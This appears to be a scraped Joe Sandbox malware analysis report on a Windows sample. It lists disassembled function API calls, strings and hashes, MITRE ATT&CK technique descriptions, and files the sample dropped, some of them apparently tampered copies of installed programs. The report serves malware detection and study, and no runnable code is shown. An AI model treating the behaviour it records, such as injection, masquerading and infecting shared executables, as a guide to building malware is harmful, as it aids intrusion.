Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd

Similarity

API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
String ID:
API String ID: 41106472-0
Opcode ID: 60604f2dcf195fa265c3ecca6f406ca3625f26d9fd480e61a9d6afd19944ccf5
Instruction ID: cd5f6fa3ed088813c1dea6f231c9f592c161548be1003763c48598d251f1e28d
Opcode Fuzzy Hash: 60604f2dcf195fa265c3ecca6f406ca3625f26d9fd480e61a9d6afd19944ccf5
Instruction Fuzzy Hash: 2811B239500111EFCB319F14EC4A99A7BABFF96B607615119F45497720DB308D86CB50

Function 00641B8A Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 81stringCOMMON

Download Yara Rule

APIs

srand.MSVCRT ref: 00641BCD
rand.MSVCRT ref: 00641BD8
memset.MSVCRT ref: 00641C43
memcpy.MSVCRT(?,FJpQMPYrrnlWAeVPISpNEPqvGqxjIaCOKThtsDHyjyidJZkwOmAgAThaoiKLXYlFwuVvfutEDRznbVsZFyuCMJxegSLLcUDpeGOUwYnfBXNIUMSRBRKCXGocjbqhWEgrtmxbZHzokWQQmlkNvcdBHsiTazdf,00000006,?,00000000,00000040,?,00000000,00000000,?,00000000,00000002), ref: 00641C4F
lstrcat.KERNEL32(?,.exe), ref: 00641C5D

Strings

FJpQMPYrrnlWAeVPISpNEPqvGqxjIaCOKThtsDHyjyidJZkwOmAgAThaoiKLXYlFwuVvfutEDRznbVsZFyuCMJxegSLLcUDpeGOUwYnfBXNIUMSRBRKCXGocjbqhWEgrtmxbZHzokWQQmlkNvcdBHsiTazdf, xrefs: 00641B8A, 00641B9C, 00641C15, 00641C49
.exe, xrefs: 00641C57

Memory Dump Source

Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true

Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd

Similarity

API ID: lstrcatmemcpymemsetrandsrand
String ID: .exe$FJpQMPYrrnlWAeVPISpNEPqvGqxjIaCOKThtsDHyjyidJZkwOmAgAThaoiKLXYlFwuVvfutEDRznbVsZFyuCMJxegSLLcUDpeGOUwYnfBXNIUMSRBRKCXGocjbqhWEgrtmxbZHzokWQQmlkNvcdBHsiTazdf
API String ID: 122620767-31980111
Opcode ID: c7022b2d813df3070c27857e67e22afe55918c44b7d6db001a93aef22e35d492
Instruction ID: 50fd5023f75ed7c5a98f060badc0b951e29f714a63e90ab33a64480b0335c5ce
Opcode Fuzzy Hash: c7022b2d813df3070c27857e67e22afe55918c44b7d6db001a93aef22e35d492
Instruction Fuzzy Hash: DD21A036E446A06ED3251335AC82BED3F47CFE3B11F1650ADF5852F792D96409C28264

Function 00641319 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00641334
GetProcAddress.KERNEL32(00000000), ref: 0064133B
memset.MSVCRT ref: 00641359

Strings

ntdll.dll, xrefs: 0064132F
NtSystemDebugControl, xrefs: 0064132A

Memory Dump Source

Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true

Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd

Similarity

API ID: AddressHandleModuleProcmemset
String ID: NtSystemDebugControl$ntdll.dll
API String ID: 3137504439-2438149413
Opcode ID: 39d5fc1ceb74d448a17fd09dff00acef1eaef3a5d9f0ac799ed9ce2879e3bc92
Instruction ID: c5cc0cef52526c8ff5bdb837fa1b077d7549666eb31a992399ee119e7281fa88
Opcode Fuzzy Hash: 39d5fc1ceb74d448a17fd09dff00acef1eaef3a5d9f0ac799ed9ce2879e3bc92
Instruction Fuzzy Hash: 0501807564031DFFDB21DF94EC85AAFBBAAFB42714F00512AF901A6240E7708685CA51

Function 00641DF6 Relevance: 7.5, APIs: 5, Instructions: 45stringCOMMON

Download Yara Rule

APIs

strrchr.MSVCRT ref: 00641E0B
lstrcpy.KERNEL32(?,00000001), ref: 00641E1C
strrchr.MSVCRT ref: 00641E2B
lstrcmpiA.KERNEL32(?,00644488), ref: 00641E48
lstrlen.KERNEL32(00644488), ref: 00641E53

Memory Dump Source

Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true

Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd

Similarity

API ID: strrchr$lstrcmpilstrcpylstrlen
String ID:
API String ID: 3636361484-0
Opcode ID: 4a1fc821c9381231aacb315e10e4f632a0ebff5d763ca36d75157efaffc17c1b
Instruction ID: 24ffba3656764ed434620b059b1ad3349077e66af580b6cbed3aa3fd051d91dd
Opcode Fuzzy Hash: 4a1fc821c9381231aacb315e10e4f632a0ebff5d763ca36d75157efaffc17c1b
Instruction Fuzzy Hash: CC014E7E8042296FDB205720DC09BD637DEDB02350F401065DB41D3180DA709AC48B90

Function 0064185B Relevance: 7.5, APIs: 5, Instructions: 31timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00641F92,00000000,?,00000000,?,?,?,00641F92,?,00000000,00000002), ref: 00641867
srand.MSVCRT ref: 00641878
rand.MSVCRT ref: 00641880
srand.MSVCRT ref: 00641890
rand.MSVCRT ref: 00641894

Memory Dump Source

Source File: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true

Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd

Similarity

API ID: Timerandsrand$FileSystem
String ID:
API String ID: 4106363736-0
Opcode ID: 70207a32605d8c1c184efc98e5c769507a3168cdf8bd5b12048932527ea536da
Instruction ID: 86f73d488de31a08bde0f37f98b9a1c50c93c1fde300f6f68c786e614d116c13
Opcode Fuzzy Hash: 70207a32605d8c1c184efc98e5c769507a3168cdf8bd5b12048932527ea536da
Instruction Fuzzy Hash: D5E0D87BA00228BBD700A7F9EC4689EBBADDE85561B100627F600D3350E5B0FD448AB8

Function 00646014 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0064603C
GetProcAddress.KERNEL32(00000000,00646064), ref: 0064604F

Strings

kernel32.dll, xrefs: 0064603B

Memory Dump Source

Source File: 00000002.00000002.2213552279.0000000000646000.00000040.00000001.01000000.00000005.sdmp, Offset: 00640000, based on PE: true

Associated: 00000002.00000002.2213440195.0000000000640000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213479346.0000000000641000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2213510615.0000000000644000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_640000_mXfByV.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: kernel32.dll
API String ID: 1646373207-1793498882
Opcode ID: 5b881b6cdfebee38944368355df32a8dd93b718a5c64bfbb85afb6142596e822
Instruction ID: 0f0b45d0814a35d56d3b0cfeeed8082114235aaa6a6532c118ca94679e66a917
Opcode Fuzzy Hash: 5b881b6cdfebee38944368355df32a8dd93b718a5c64bfbb85afb6142596e822
Instruction Fuzzy Hash: 62F0F0B11402899FEF70CEA4CC44BDE3BE5EB16B00F50442AFA09CB281CB7486458B25

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

C:\Program Files\7-Zip\Uninstall.exe

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_mXfByV.exe_919bb28fed6369b5f15fcb8611a4c2ec66970_160339ea_7b1e5d23-ca14-442c-a24d-bd558aa78ac0\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBFE6.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC15E.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC17F.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k1[1].rar

C:\Users\user\AppData\Local\Temp\58895C5A.exe

C:\Users\user\AppData\Local\Temp\mXfByV.exe

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Windows Analysis Report
SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe

Function 006429E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128
stringfileCOMMON

Function 00641099 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 74
stringsleepprocessCOMMON

Function 00641718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65
timeCOMMON

Function 00646076 Relevance: 11.1, APIs: 7, Instructions: 616
memoryCOMMON

Function 00642B8C Relevance: 10.6, APIs: 7, Instructions: 74
threadstringCOMMON

Function 00641E6E Relevance: 44.1, APIs: 20, Strings: 5, Instructions: 380
fileCOMMON

Function 00641973 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 144
filesleepmemoryCOMMON

Function 006428B8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 100
stringCOMMON

Function 00641638 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 70
stringsynchronizationthreadCOMMON

Function 00641000 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 60
fileCOMMON

Function 00642C48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
threadCOMMON

Function 006414E1 Relevance: 4.6, APIs: 3, Instructions: 55
COMMON

Function 00641915 Relevance: 4.5, APIs: 3, Instructions: 41
timeCOMMON

Function 00646159 Relevance: 2.6, APIs: 2, Instructions: 56
memoryCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre